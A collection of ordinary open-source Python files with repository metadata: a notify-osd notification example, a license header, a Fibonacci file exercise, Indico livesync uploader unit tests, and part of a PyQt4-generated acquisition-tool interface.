time.sleep (3) # simulate a user typing
if __name__ == '__main__':
if not pynotify.init ("append-hint-example"):
sys.exit (1)
# call this so we can savely use capabilities dictionary later
initCaps ()
# show what's supported
printCaps ()
# try the append-hint
if capabilities['x-canonical-append']:
pushNotification ("Cole Raby",
"Hey Bro Coly!",
"notification-message-im");
pushNotification ("Cole Raby",
"What's up dude?",
"notification-message-im");
pushNotification ("Cole Raby",
"Did you watch the air-race in Oshkosh last week?",
"notification-message-im");
pushNotification ("Cole Raby",
"Phil owned the place like no one before him!",
"notification-message-im");
pushNotification ("Cole Raby",
"Did really everything in the race work according to regulations?",
"notification-message-im");
pushNotification ("Cole Raby",
"Somehow I think to remember Burt Williams did cut corners and was not punished for this.",
"notification-message-im");
pushNotification ("Cole Raby",
"Hopefully the referees will watch the videos of the race.",
"notification-message-im");
pushNotification ("Cole Raby",
"Burt could get fined with US$ 50000 for that rule-violation :)",
"notification-message-im");
else:
print "The daemon does not support the x-canonical-append hint!"
|
dkasak/notify-osd-customizable
|
examples/append-hint-example.py
|
Python
|
gpl-3.0
| 5,175
|
####################################################################################################
#
# Patro - A Python library to make patterns for fashion design
# Copyright (C) 2019 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
####################################################################################################
|
FabriceSalvaire/PyValentina
|
tools/license-template.py
|
Python
|
gpl-3.0
| 965
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
#
# DAI - Desarrollo de Aplicaciones para Internet
#
# 2014 Ernesto Serrano <erseco@correo.ugr.es>
#
#-----------------------------------------------
Cree un programa que lea de un fichero de texto un numero entero n y escriba en otro fichero de
texto el n-esimo numero de la sucesion de Fibonacci (http://es.wikipedia.org/wiki/Sucesi\%C3\%B3n_de_Fibonacci).
'''
# Funcion para calcular el enésimo digito de la sucesión de fibonacci
def fibonacci(n):
if n == 0:
return 0
elif n == 1:
return 1
else:
return fibonacci(n-1) + fibonacci(n-2)
# Leemos el fichero
file_in = open("fichero.txt", "rt")
n = file_in.read()
# Comprobamos que lo que tengamos sea un numero
if n.isdigit():
n = int(n)
# Creamos el fichero de salida
file_out = open("salida.txt", "wt")
# Escribimos el enesimo digito de la sucesión de fibonacci
file_out.write(str(fibonacci(n)))
# Cerramos el fichero
file_out.close()
|
erseco/ugr_desarrollo_aplicaciones_internet
|
Practica_01/ejercicio_04.py
|
Python
|
gpl-3.0
| 997
|
# This file is part of Indico.
# Copyright (C) 2002 - 2016 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from mock import MagicMock, Mock
from indico_livesync import SimpleChange
from indico_livesync.models.queue import LiveSyncQueueEntry, ChangeType, EntryType
from indico_livesync.uploader import Uploader, MARCXMLUploader
from MaKaC.conference import Conference
class RecordingUploader(Uploader):
"""An uploader which logs each 'upload'"""
def __init__(self, *args, **kwargs):
super(RecordingUploader, self).__init__(*args, **kwargs)
self._uploaded = []
self.logger = MagicMock()
def upload_records(self, records, from_queue):
if from_queue:
recs = set(records.viewitems())
self._uploaded.append((recs, from_queue))
else:
self._uploaded.append((set(records), from_queue))
@property
def all_uploaded(self):
return self._uploaded
class FailingUploader(RecordingUploader):
"""An uploader where the second batch fails"""
def __init__(self, *args, **kwargs):
super(FailingUploader, self).__init__(*args, **kwargs)
self._n = 0
def upload_records(self, records, from_queue):
super(FailingUploader, self).upload_records(records, from_queue)
self._n += 1
if self._n == 2:
raise Exception('All your data are belong to us!')
def test_run_initial(mocker):
"""Test the initial upload"""
mocker.patch.object(Uploader, 'processed_records', autospec=True)
uploader = RecordingUploader(MagicMock())
uploader.INITIAL_BATCH_SIZE = 3
records = tuple(Mock(spec=Conference, id=evt_id) for evt_id in xrange(4))
uploader.run_initial(records)
# We expect two batches, with the second one being smaller (i.e. no None padding, just the events)
batches = set(records[:3]), set(records[3:])
assert uploader.all_uploaded == [(batches[0], False), (batches[1], False)]
# During an initial export there are no records to mark as processed
assert not uploader.processed_records.called
def test_run(mocker, db, create_event, dummy_agent):
"""Test uploading queued data"""
uploader = RecordingUploader(MagicMock())
uploader.BATCH_SIZE = 3
events = tuple(create_event(id_=evt_id) for evt_id in xrange(4))
records = tuple(LiveSyncQueueEntry(change=ChangeType.created, type=EntryType.event, event_id=evt.id,
agent=dummy_agent)
for evt in events)
for rec in records:
db.session.add(rec)
db.session.flush()
db_mock = mocker.patch('indico_livesync.uploader.db')
uploader.run(records)
objs = tuple((record.object, int(SimpleChange.created)) for record in records)
batches = set(objs[:3]), set(objs[3:])
assert uploader.all_uploaded == [(batches[0], True), (batches[1], True)]
# All records should be marked as processed
assert all(record.processed for record in records)
# Marking records as processed is committed immediately
assert db_mock.session.commit.call_count == 2
def test_run_failing(mocker, db, create_event, dummy_agent):
"""Test a failing queue run"""
uploader = FailingUploader(MagicMock())
uploader.BATCH_SIZE = 3
events = tuple(create_event(id_=evt_id) for evt_id in xrange(10))
records = tuple(LiveSyncQueueEntry(change=ChangeType.created, type=EntryType.event, event_id=evt.id,
agent=dummy_agent)
for evt in events)
for rec in records:
db.session.add(rec)
db.session.flush()
db_mock = mocker.patch('indico_livesync.uploader.db')
uploader.run(records)
objs = tuple((record.object, int(SimpleChange.created)) for record in records)
assert uploader.logger.exception.called
# No uploads should happen after a failed batch
assert uploader._uploaded == [(set(objs[:3]), True), (set(objs[3:6]), True)]
# Only successful records should be marked as processed
assert all(record.processed for record in records[:3])
assert not any(record.processed for record in records[3:])
# Only the first uccessful batch should have triggered a commit
assert db_mock.session.commit.call_count == 1
def test_marcxml_run(mocker, db, dummy_event_new, dummy_agent):
"""Text if the MARCXML uploader uses the correct function"""
mocker.patch('indico_livesync.uploader.db')
mocker.patch.object(MARCXMLUploader, 'upload_xml', autospec=True)
mxg = mocker.patch('indico_livesync.uploader.MARCXMLGenerator')
entry = LiveSyncQueueEntry(change=ChangeType.created, type=EntryType.event, event_new=dummy_event_new,
agent=dummy_agent)
db.session.add(entry)
db.session.flush()
uploader = MARCXMLUploader(MagicMock())
uploader.run([entry])
assert mxg.records_to_xml.called
assert not mxg.objects_to_xml.called
assert uploader.upload_xml.called
mxg.reset_mock()
uploader.run_initial([1])
assert not mxg.records_to_xml.called
assert mxg.objects_to_xml.called
assert uploader.upload_xml.called
def test_marcxml_empty_result(mocker):
"""Test if the MARCXML uploader doesn't upload empty records"""
mocker.patch('indico_livesync.uploader.MARCXMLGenerator.objects_to_xml', return_value=None)
mocker.patch.object(MARCXMLUploader, 'upload_xml', autospec=True)
uploader = MARCXMLUploader(MagicMock())
uploader.run_initial([1])
assert not uploader.upload_xml.called
|
OmeGak/indico-plugins
|
livesync/tests/uploader_test.py
|
Python
|
gpl-3.0
| 6,150
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'User_interface.ui'
#
# Created: Tue May 16 10:33:40 2017
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_PyQtGate(object):
def setupUi(self, PyQtGate):
PyQtGate.setObjectName(_fromUtf8("PyQtGate"))
PyQtGate.setWindowModality(QtCore.Qt.ApplicationModal)
PyQtGate.resize(862, 575)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(PyQtGate.sizePolicy().hasHeightForWidth())
PyQtGate.setSizePolicy(sizePolicy)
PyQtGate.setAcceptDrops(False)
PyQtGate.setAutoFillBackground(False)
PyQtGate.setModal(True)
self.tabPrincipal = QtGui.QTabWidget(PyQtGate)
self.tabPrincipal.setGeometry(QtCore.QRect(6, 7, 851, 561))
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tabPrincipal.sizePolicy().hasHeightForWidth())
self.tabPrincipal.setSizePolicy(sizePolicy)
self.tabPrincipal.setObjectName(_fromUtf8("tabPrincipal"))
self.tab_mostrador = QtGui.QWidget()
self.tab_mostrador.setObjectName(_fromUtf8("tab_mostrador"))
self.pB_startacq = QtGui.QPushButton(self.tab_mostrador)
self.pB_startacq.setGeometry(QtCore.QRect(520, 498, 141, 27))
self.pB_startacq.setObjectName(_fromUtf8("pB_startacq"))
self.l_mostrador = QtGui.QLabel(self.tab_mostrador)
self.l_mostrador.setGeometry(QtCore.QRect(110, 503, 111, 17))
self.l_mostrador.setObjectName(_fromUtf8("l_mostrador"))
self.label_7 = QtGui.QLabel(self.tab_mostrador)
self.label_7.setGeometry(QtCore.QRect(30, 503, 81, 17))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_7.setFont(font)
self.label_7.setObjectName(_fromUtf8("label_7"))
self.vS_channel_1 = QtGui.QSlider(self.tab_mostrador)
self.vS_channel_1.setGeometry(QtCore.QRect(758, 27, 29, 61))
self.vS_channel_1.setMaximum(1023)
self.vS_channel_1.setProperty("value", 512)
self.vS_channel_1.setTracking(True)
self.vS_channel_1.setOrientation(QtCore.Qt.Vertical)
self.vS_channel_1.setObjectName(_fromUtf8("vS_channel_1"))
self.lE_channel_1 = QtGui.QLineEdit(self.tab_mostrador)
self.lE_channel_1.setGeometry(QtCore.QRect(788, 47, 41, 27))
self.lE_channel_1.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_channel_1.setObjectName(_fromUtf8("lE_channel_1"))
self.vS_channel_2 = QtGui.QSlider(self.tab_mostrador)
self.vS_channel_2.setGeometry(QtCore.QRect(758, 107, 29, 61))
self.vS_channel_2.setMaximum(1023)
self.vS_channel_2.setProperty("value", 512)
self.vS_channel_2.setSliderPosition(512)
self.vS_channel_2.setOrientation(QtCore.Qt.Vertical)
self.vS_channel_2.setObjectName(_fromUtf8("vS_channel_2"))
self.lE_channel_2 = QtGui.QLineEdit(self.tab_mostrador)
self.lE_channel_2.setGeometry(QtCore.QRect(788, 127, 41, 27))
self.lE_channel_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_channel_2.setObjectName(_fromUtf8("lE_channel_2"))
self.lE_channel_5 = QtGui.QLineEdit(self.tab_mostrador)
self.lE_channel_5.setGeometry(QtCore.QRect(788, 367, 41, 27))
self.lE_channel_5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_channel_5.setObjectName(_fromUtf8("lE_channel_5"))
self.lE_channel_4 = QtGui.QLineEdit(self.tab_mostrador)
self.lE_channel_4.setGeometry(QtCore.QRect(788, 287, 41, 27))
self.lE_channel_4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_channel_4.setObjectName(_fromUtf8("lE_channel_4"))
self.lE_channel_3 = QtGui.QLineEdit(self.tab_mostrador)
self.lE_channel_3.setGeometry(QtCore.QRect(788, 207, 41, 27))
self.lE_channel_3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_channel_3.setObjectName(_fromUtf8("lE_channel_3"))
self.lE_channel_6 = QtGui.QLineEdit(self.tab_mostrador)
self.lE_channel_6.setGeometry(QtCore.QRect(788, 447, 41, 27))
self.lE_channel_6.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_channel_6.setObjectName(_fromUtf8("lE_channel_6"))
self.vS_channel_4 = QtGui.QSlider(self.tab_mostrador)
self.vS_channel_4.setGeometry(QtCore.QRect(758, 267, 29, 61))
self.vS_channel_4.setMaximum(1023)
self.vS_channel_4.setProperty("value", 512)
self.vS_channel_4.setOrientation(QtCore.Qt.Vertical)
self.vS_channel_4.setObjectName(_fromUtf8("vS_channel_4"))
self.vS_channel_3 = QtGui.QSlider(self.tab_mostrador)
self.vS_channel_3.setGeometry(QtCore.QRect(758, 187, 29, 61))
self.vS_channel_3.setMaximum(1023)
self.vS_channel_3.setProperty("value", 512)
self.vS_channel_3.setOrientation(QtCore.Qt.Vertical)
self.vS_channel_3.setObjectName(_fromUtf8("vS_channel_3"))
self.vS_channel_5 = QtGui.QSlider(self.tab_mostrador)
self.vS_channel_5.setGeometry(QtCore.QRect(758, 347, 29, 61))
self.vS_channel_5.setMaximum(1023)
self.vS_channel_5.setProperty("value", 512)
self.vS_channel_5.setOrientation(QtCore.Qt.Vertical)
self.vS_channel_5.setObjectName(_fromUtf8("vS_channel_5"))
self.vS_channel_6 = QtGui.QSlider(self.tab_mostrador)
self.vS_channel_6.setGeometry(QtCore.QRect(758, 427, 29, 61))
self.vS_channel_6.setMaximum(1023)
self.vS_channel_6.setProperty("value", 512)
self.vS_channel_6.setOrientation(QtCore.Qt.Vertical)
self.vS_channel_6.setObjectName(_fromUtf8("vS_channel_6"))
self.tab_views = QtGui.QTabWidget(self.tab_mostrador)
self.tab_views.setGeometry(QtCore.QRect(2, 3, 751, 491))
self.tab_views.setTabPosition(QtGui.QTabWidget.West)
self.tab_views.setObjectName(_fromUtf8("tab_views"))
self.tab_separados = QtGui.QWidget()
self.tab_separados.setObjectName(_fromUtf8("tab_separados"))
self.pW_channel_5 = PlotWidget(self.tab_separados)
self.pW_channel_5.setGeometry(QtCore.QRect(8, 349, 701, 51))
self.pW_channel_5.setObjectName(_fromUtf8("pW_channel_5"))
self.pW_channel_3 = PlotWidget(self.tab_separados)
self.pW_channel_3.setGeometry(QtCore.QRect(8, 189, 701, 51))
self.pW_channel_3.setObjectName(_fromUtf8("pW_channel_3"))
self.sP_channel_4 = QtGui.QSpinBox(self.tab_separados)
self.sP_channel_4.setGeometry(QtCore.QRect(78, 246, 61, 21))
self.sP_channel_4.setMinimum(1)
self.sP_channel_4.setObjectName(_fromUtf8("sP_channel_4"))
self.lE_time_1 = QtGui.QLineEdit(self.tab_separados)
self.lE_time_1.setGeometry(QtCore.QRect(148, 5, 81, 21))
self.lE_time_1.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_time_1.setObjectName(_fromUtf8("lE_time_1"))
self.sP_channel_2 = QtGui.QSpinBox(self.tab_separados)
self.sP_channel_2.setGeometry(QtCore.QRect(79, 86, 61, 21))
self.sP_channel_2.setMinimum(1)
self.sP_channel_2.setObjectName(_fromUtf8("sP_channel_2"))
self.lE_time_5 = QtGui.QLineEdit(self.tab_separados)
self.lE_time_5.setGeometry(QtCore.QRect(148, 325, 81, 21))
self.lE_time_5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_time_5.setObjectName(_fromUtf8("lE_time_5"))
self.cB_subida_4 = QtGui.QCheckBox(self.tab_separados)
self.cB_subida_4.setGeometry(QtCore.QRect(313, 246, 100, 22))
self.cB_subida_4.setChecked(True)
self.cB_subida_4.setObjectName(_fromUtf8("cB_subida_4"))
self.pW_channel_4 = PlotWidget(self.tab_separados)
self.pW_channel_4.setGeometry(QtCore.QRect(8, 269, 701, 51))
self.pW_channel_4.setObjectName(_fromUtf8("pW_channel_4"))
self.cB_descida_2 = QtGui.QCheckBox(self.tab_separados)
self.cB_descida_2.setGeometry(QtCore.QRect(408, 86, 100, 22))
self.cB_descida_2.setObjectName(_fromUtf8("cB_descida_2"))
self.l_channel_8 = QtGui.QLabel(self.tab_separados)
self.l_channel_8.setGeometry(QtCore.QRect(232, 90, 70, 16))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.l_channel_8.setFont(font)
self.l_channel_8.setObjectName(_fromUtf8("l_channel_8"))
self.sP_channel_3 = QtGui.QSpinBox(self.tab_separados)
self.sP_channel_3.setGeometry(QtCore.QRect(79, 166, 61, 21))
self.sP_channel_3.setMinimum(1)
self.sP_channel_3.setObjectName(_fromUtf8("sP_channel_3"))
self.l_channel_12 = QtGui.QLabel(self.tab_separados)
self.l_channel_12.setGeometry(QtCore.QRect(232, 410, 70, 16))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.l_channel_12.setFont(font)
self.l_channel_12.setObjectName(_fromUtf8("l_channel_12"))
self.l_channel_9 = QtGui.QLabel(self.tab_separados)
self.l_channel_9.setGeometry(QtCore.QRect(232, 170, 70, 16))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.l_channel_9.setFont(font)
self.l_channel_9.setObjectName(_fromUtf8("l_channel_9"))
self.cB_subida_1 = QtGui.QCheckBox(self.tab_separados)
self.cB_subida_1.setGeometry(QtCore.QRect(312, 6, 97, 22))
self.cB_subida_1.setChecked(True)
self.cB_subida_1.setObjectName(_fromUtf8("cB_subida_1"))
self.l_channel_10 = QtGui.QLabel(self.tab_separados)
self.l_channel_10.setGeometry(QtCore.QRect(232, 250, 70, 16))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.l_channel_10.setFont(font)
self.l_channel_10.setObjectName(_fromUtf8("l_channel_10"))
self.lE_time_3 = QtGui.QLineEdit(self.tab_separados)
self.lE_time_3.setGeometry(QtCore.QRect(149, 165, 81, 21))
self.lE_time_3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_time_3.setObjectName(_fromUtf8("lE_time_3"))
self.pW_channel_2 = PlotWidget(self.tab_separados)
self.pW_channel_2.setGeometry(QtCore.QRect(8, 109, 701, 51))
self.pW_channel_2.setObjectName(_fromUtf8("pW_channel_2"))
self.cB_descida_5 = QtGui.QCheckBox(self.tab_separados)
self.cB_descida_5.setGeometry(QtCore.QRect(408, 325, 100, 22))
self.cB_descida_5.setObjectName(_fromUtf8("cB_descida_5"))
self.l_channel_11 = QtGui.QLabel(self.tab_separados)
self.l_channel_11.setGeometry(QtCore.QRect(232, 330, 70, 16))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.l_channel_11.setFont(font)
self.l_channel_11.setObjectName(_fromUtf8("l_channel_11"))
self.cB_descida_6 = QtGui.QCheckBox(self.tab_separados)
self.cB_descida_6.setGeometry(QtCore.QRect(408, 405, 100, 22))
self.cB_descida_6.setObjectName(_fromUtf8("cB_descida_6"))
self.cB_subida_3 = QtGui.QCheckBox(self.tab_separados)
self.cB_subida_3.setGeometry(QtCore.QRect(313, 165, 100, 22))
self.cB_subida_3.setChecked(True)
self.cB_subida_3.setObjectName(_fromUtf8("cB_subida_3"))
self.sP_channel_5 = QtGui.QSpinBox(self.tab_separados)
self.sP_channel_5.setGeometry(QtCore.QRect(78, 326, 61, 21))
self.sP_channel_5.setMinimum(1)
self.sP_channel_5.setObjectName(_fromUtf8("sP_channel_5"))
self.sP_channel_6 = QtGui.QSpinBox(self.tab_separados)
self.sP_channel_6.setGeometry(QtCore.QRect(78, 406, 61, 21))
self.sP_channel_6.setMinimum(1)
self.sP_channel_6.setObjectName(_fromUtf8("sP_channel_6"))
self.cB_subida_2 = QtGui.QCheckBox(self.tab_separados)
self.cB_subida_2.setGeometry(QtCore.QRect(313, 86, 100, 22))
self.cB_subida_2.setChecked(True)
self.cB_subida_2.setObjectName(_fromUtf8("cB_subida_2"))
self.sP_channel_1 = QtGui.QSpinBox(self.tab_separados)
self.sP_channel_1.setGeometry(QtCore.QRect(78, 6, 61, 21))
self.sP_channel_1.setMinimum(1)
self.sP_channel_1.setObjectName(_fromUtf8("sP_channel_1"))
self.cB_descida_4 = QtGui.QCheckBox(self.tab_separados)
self.cB_descida_4.setGeometry(QtCore.QRect(408, 246, 100, 22))
self.cB_descida_4.setObjectName(_fromUtf8("cB_descida_4"))
self.cB_subida_5 = QtGui.QCheckBox(self.tab_separados)
self.cB_subida_5.setGeometry(QtCore.QRect(313, 325, 100, 22))
self.cB_subida_5.setChecked(True)
self.cB_subida_5.setObjectName(_fromUtf8("cB_subida_5"))
self.pW_channel_6 = PlotWidget(self.tab_separados)
self.pW_channel_6.setGeometry(QtCore.QRect(8, 429, 701, 51))
self.pW_channel_6.setObjectName(_fromUtf8("pW_channel_6"))
self.cB_descida_3 = QtGui.QCheckBox(self.tab_separados)
self.cB_descida_3.setGeometry(QtCore.QRect(408, 165, 100, 22))
self.cB_descida_3.setObjectName(_fromUtf8("cB_descida_3"))
self.cB_subida_6 = QtGui.QCheckBox(self.tab_separados)
self.cB_subida_6.setGeometry(QtCore.QRect(313, 405, 100, 22))
self.cB_subida_6.setChecked(True)
self.cB_subida_6.setObjectName(_fromUtf8("cB_subida_6"))
self.l_channel_7 = QtGui.QLabel(self.tab_separados)
self.l_channel_7.setGeometry(QtCore.QRect(231, 10, 70, 16))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.l_channel_7.setFont(font)
self.l_channel_7.setObjectName(_fromUtf8("l_channel_7"))
self.lE_time_6 = QtGui.QLineEdit(self.tab_separados)
self.lE_time_6.setGeometry(QtCore.QRect(148, 405, 81, 21))
self.lE_time_6.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_time_6.setObjectName(_fromUtf8("lE_time_6"))
self.lE_time_2 = QtGui.QLineEdit(self.tab_separados)
self.lE_time_2.setGeometry(QtCore.QRect(149, 85, 81, 21))
self.lE_time_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_time_2.setObjectName(_fromUtf8("lE_time_2"))
self.cB_descida_1 = QtGui.QCheckBox(self.tab_separados)
self.cB_descida_1.setGeometry(QtCore.QRect(407, 6, 97, 22))
self.cB_descida_1.setObjectName(_fromUtf8("cB_descida_1"))
self.lE_time_4 = QtGui.QLineEdit(self.tab_separados)
self.lE_time_4.setGeometry(QtCore.QRect(148, 245, 81, 21))
self.lE_time_4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_time_4.setObjectName(_fromUtf8("lE_time_4"))
self.pW_channel_1 = PlotWidget(self.tab_separados)
self.pW_channel_1.setGeometry(QtCore.QRect(8, 29, 701, 51))
self.pW_channel_1.setObjectName(_fromUtf8("pW_channel_1"))
self.tab_views.addTab(self.tab_separados, _fromUtf8(""))
self.tab_juntos = QtGui.QWidget()
self.tab_juntos.setObjectName(_fromUtf8("tab_juntos"))
self.pW_all = PlotWidget(self.tab_juntos)
self.pW_all.setGeometry(QtCore.QRect(9, 7, 701, 341))
self.pW_all.setObjectName(_fromUtf8("pW_all"))
self.tW_timetable = QtGui.QTableWidget(self.tab_juntos)
self.tW_timetable.setGeometry(QtCore.QRect(182, 357, 528, 111))
font = QtGui.QFont()
font.setPointSize(9)
font.setBold(True)
font.setWeight(75)
self.tW_timetable.setFont(font)
self.tW_timetable.setObjectName(_fromUtf8("tW_timetable"))
self.tW_timetable.setColumnCount(0)
self.tW_timetable.setRowCount(0)
self.tW_timetable.horizontalHeader().setDefaultSectionSize(85)
self.tW_timetable.verticalHeader().setDefaultSectionSize(20)
self.pB_timetable = QtGui.QPushButton(self.tab_juntos)
self.pB_timetable.setGeometry(QtCore.QRect(40, 410, 111, 27))
self.pB_timetable.setObjectName(_fromUtf8("pB_timetable"))
self.tab_views.addTab(self.tab_juntos, _fromUtf8(""))
self.cB_constrain = QtGui.QCheckBox(self.tab_mostrador)
self.cB_constrain.setGeometry(QtCore.QRect(690, 501, 151, 22))
self.cB_constrain.setStyleSheet(_fromUtf8("color: rgb(0, 0, 0);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_constrain.setObjectName(_fromUtf8("cB_constrain"))
self.cB_channel_1 = QtGui.QCheckBox(self.tab_mostrador)
self.cB_channel_1.setGeometry(QtCore.QRect(762, 9, 81, 22))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.cB_channel_1.setFont(font)
self.cB_channel_1.setStyleSheet(_fromUtf8("color: rgb(0, 0, 255);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_channel_1.setChecked(True)
self.cB_channel_1.setObjectName(_fromUtf8("cB_channel_1"))
self.cB_channel_2 = QtGui.QCheckBox(self.tab_mostrador)
self.cB_channel_2.setGeometry(QtCore.QRect(762, 90, 81, 22))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.cB_channel_2.setFont(font)
self.cB_channel_2.setStyleSheet(_fromUtf8("color: rgb(0, 255, 0);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_channel_2.setChecked(True)
self.cB_channel_2.setObjectName(_fromUtf8("cB_channel_2"))
self.cB_channel_3 = QtGui.QCheckBox(self.tab_mostrador)
self.cB_channel_3.setGeometry(QtCore.QRect(762, 170, 81, 22))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.cB_channel_3.setFont(font)
self.cB_channel_3.setStyleSheet(_fromUtf8("color: rgb(255, 0, 0);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_channel_3.setChecked(True)
self.cB_channel_3.setObjectName(_fromUtf8("cB_channel_3"))
self.cB_channel_4 = QtGui.QCheckBox(self.tab_mostrador)
self.cB_channel_4.setGeometry(QtCore.QRect(762, 250, 81, 22))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.cB_channel_4.setFont(font)
self.cB_channel_4.setStyleSheet(_fromUtf8("color: rgb(0, 128, 128);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_channel_4.setChecked(True)
self.cB_channel_4.setObjectName(_fromUtf8("cB_channel_4"))
self.cB_channel_5 = QtGui.QCheckBox(self.tab_mostrador)
self.cB_channel_5.setGeometry(QtCore.QRect(762, 330, 81, 22))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.cB_channel_5.setFont(font)
self.cB_channel_5.setStyleSheet(_fromUtf8("color: rgb(128, 128, 0);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_channel_5.setChecked(True)
self.cB_channel_5.setObjectName(_fromUtf8("cB_channel_5"))
self.cB_channel_6 = QtGui.QCheckBox(self.tab_mostrador)
self.cB_channel_6.setGeometry(QtCore.QRect(762, 410, 81, 22))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.cB_channel_6.setFont(font)
self.cB_channel_6.setStyleSheet(_fromUtf8("color: rgb(128, 0, 128);\n"
"background-color: rgb(255, 255, 255);"))
self.cB_channel_6.setChecked(True)
self.cB_channel_6.setObjectName(_fromUtf8("cB_channel_6"))
self.label_8 = QtGui.QLabel(self.tab_mostrador)
self.label_8.setGeometry(QtCore.QRect(334, 504, 51, 17))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_8.setFont(font)
self.label_8.setObjectName(_fromUtf8("label_8"))
self.lE_delay = QtGui.QLineEdit(self.tab_mostrador)
self.lE_delay.setGeometry(QtCore.QRect(394, 502, 61, 21))
self.lE_delay.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lE_delay.setObjectName(_fromUtf8("lE_delay"))
self.label_9 = QtGui.QLabel(self.tab_mostrador)
self.label_9.setGeometry(QtCore.QRect(460, 504, 21, 17))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.label_9.setFont(font)
self.label_9.setObjectName(_fromUtf8("label_9"))
self.tabPrincipal.addTab(self.tab_mostrador, _fromUtf8(""))
self.tab_arquivo = QtGui.QWidget()
self.tab_arquivo.setObjectName(_fromUtf8("tab_arquivo"))
self.pB_save = QtGui.QPushButton(self.tab_arquivo)
self.pB_save.setGeometry(QtCore.QRect(80, 70, 181, 27))
self.pB_save.setObjectName(_fromUtf8("pB_save"))
self.pB_load = QtGui.QPushButton(self.tab_arquivo)
self.pB_load.setGeometry(QtCore.QRect(80, 110, 181, 27))
self.pB_load.setObjectName(_fromUtf8("pB_load"))
self.pB_savetime = QtGui.QPushButton(self.tab_arquivo)
self.pB_savetime.setGeometry(QtCore.QRect(310, 70, 181, 27))
self.pB_savetime.setObjectName(_fromUtf8("pB_savetime"))
self.tabPrincipal.addTab(self.tab_arquivo, _fromUtf8(""))
self.tab_serial = QtGui.QWidget()
self.tab_serial.setObjectName(_fromUtf8("tab_serial"))
self.pB_connect = QtGui.QPushButton(self.tab_serial)
self.pB_connect.setGeometry(QtCore.QRect(70, 90, 261, 27))
self.pB_connect.setObjectName(_fromUtf8("pB_connect"))
self.label_2 = QtGui.QLabel(self.tab_serial)
self.label_2.setGeometry(QtCore.QRect(70, 40, 311, 17))
